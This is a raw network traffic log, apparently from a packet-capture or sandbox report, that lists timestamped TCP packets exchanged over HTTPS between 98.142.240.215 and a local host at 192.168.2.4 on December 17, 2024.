                                                                                                                                                                              Dec 17, 2024 18:12:32.983530045 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.983623028 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.983632088 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.983680010 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.987334013 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.987406969 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.987416029 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.987521887 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.990351915 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.990426064 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.990433931 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.990482092 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.993912935 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.994009018 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.994016886 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.994062901 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.997148991 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.997277975 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:32.997304916 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:32.997354031 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.000190020 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.000261068 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.000268936 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.000319958 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.037111998 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.037211895 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.037235975 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.037291050 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.040133953 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.040213108 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.040221930 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.040268898 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.147324085 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.147564888 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.147598982 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.147658110 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.152600050 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.152707100 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.152721882 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.152764082 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.156138897 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.156245947 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.156260967 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.156305075 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.159326077 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.159414053 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.159430981 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.159472942 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.163168907 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.163250923 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.163260937 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.163304090 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.166197062 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.166290045 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.166299105 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.166349888 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.169473886 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.169585943 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.169595957 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.169640064 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.173281908 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.173368931 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.173379898 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.173438072 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.176337957 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.176446915 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.176456928 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.176503897 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.179709911 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.179797888 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.179807901 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.179848909 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.183382988 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.183468103 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.183485985 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.183532953 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.186201096 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.186280966 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.186290979 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.186335087 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.189913034 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.190013885 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.190023899 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.190069914 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.193166971 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.193264961 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.193274975 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.193315983 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.229329109 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.229465961 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.229479074 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.229559898 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.232408047 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.232490063 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.232496977 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.232538939 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.339917898 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.340027094 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.340039015 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.340142012 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.345319986 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.345401049 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.345407963 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.345448017 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.348160028 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.348227024 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.348233938 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.348269939 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.351397991 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.351471901 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.351479053 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.351522923 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.355228901 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.355293036 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.355302095 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.355355978 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.358510017 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.358572960 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.358581066 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.358620882 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.361572027 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.361701012 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.361707926 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.361745119 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.365503073 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.365684032 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.365690947 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.365736961 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.368681908 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.368801117 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.368808031 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.368843079 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.371654034 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.371742010 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.371747971 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.371795893 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.375418901 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.375500917 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.375507116 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.375550032 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.378972054 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.379045010 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.379051924 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.379089117 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.382000923 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.382081985 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.382091045 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.382133007 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.385344028 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.385432005 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.385438919 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.385485888 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.421235085 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.421340942 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.421349049 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.421394110 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.424618006 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.424720049 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.424753904 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.424804926 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.532056093 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.532314062 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.532371044 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.532438993 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.537390947 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.537504911 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.537514925 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.537565947 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.540652990 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.540747881 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.540757895 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.540808916 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.543718100 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.543806076 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.543819904 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.543881893 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.547516108 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.547609091 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.547622919 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.547681093 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.550726891 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.550832987 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.550847054 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.550909996 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.554586887 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.554703951 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.554718018 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.554783106 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.557662010 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.557763100 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.557775974 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.557842016 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.560810089 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.560919046 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.560931921 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.560997009 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.564654112 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.564754963 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.564768076 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.564830065 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.567756891 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.567845106 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.567861080 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.567918062 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.571227074 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.571321011 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.571333885 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.571400881 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.574506044 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.574610949 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.574624062 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.574687004 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.577555895 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.577646971 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.577661037 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.577722073 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.613950014 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.614125013 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.614181042 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.614255905 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.616770029 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.616905928 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:33.616942883 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:33.617012024 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.016354084 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.016367912 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.016450882 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.016488075 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.016530037 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.019537926 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.019603968 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.019613981 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.019651890 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.022797108 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.022871971 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.022881031 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.022919893 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.025671959 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.025738955 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.025747061 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.025784969 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.029341936 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.029418945 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.029427052 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.029465914 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.032319069 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.032386065 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.032392025 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.032445908 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.035233974 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.035299063 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.035305977 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.035358906 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.039205074 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.039272070 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.039278984 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.039320946 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.042422056 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.042489052 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.042496920 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.042546988 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.046355009 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.046423912 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.046431065 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.046468019 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.049416065 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.049479961 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.049487114 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.049523115 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.053385973 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.053452969 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.053461075 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.053505898 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.057387114 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.057455063 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.057462931 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.057498932 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.060283899 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.060348988 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.060355902 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.060401917 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.063599110 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.063664913 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.063672066 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.063714981 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.066862106 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.066926003 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.066934109 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.066982985 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.070207119 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.070272923 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.070281029 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.070318937 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.073093891 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.073153973 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:34.073162079 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:34.073199034 CET49731443192.168.2.498.142.240.215
